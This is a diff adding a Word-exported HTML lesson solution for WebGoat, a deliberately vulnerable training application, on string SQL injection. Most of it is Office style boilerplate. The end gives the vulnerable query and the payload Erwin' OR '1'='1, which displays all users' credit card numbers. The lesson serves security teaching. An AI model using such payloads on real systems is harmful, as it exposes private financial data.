+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="3074"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Perform String SQL Injection <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<!-- Start Instructions -->
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>SQL injection
+attacks represent a serious threat to any database-driven site. The methods
+behind an attack are easy to learn and the damage caused can range from
+considerable to complete system compromise. Despite these risks, an incredible
+number of systems on the internet are susceptible to this form of attack. <br>
+<br>
+Not only is it a threat easily instigated, it is also a threat that, with a
+little common-sense and forethought, can easily be prevented.<br>
+<br>
+It is always good practice to sanitize all input data, especially data that
+will used in OS command, scripts, and database queiries, even if the threat of
+SQL injection has been prevented in some other manner.<o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The form
+below allows a user to view their credit card numbers. Try to inject an SQL
+string that results in all the credit card numbers being displayed. Try the
+user name of 'Smith'.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Compared with
+the previous lesson, there is now a string parameter and not an integer.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Strings must be
+terminated with single quotes to have a valid SQL Query.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_1536" o:spid="_x0000_i1026" type="#_x0000_t75"
+ style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/SqlStringInjection_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/SqlStringInjection_files/image005.jpg" v:shapes="Picture_x0020_1536"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 18<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The query
+used in this lesson is: SELECT * FROM user_data WHERE last_name = 'Your Name'<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Enter for the
+last name value: Erwin' OR '1'='1 <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
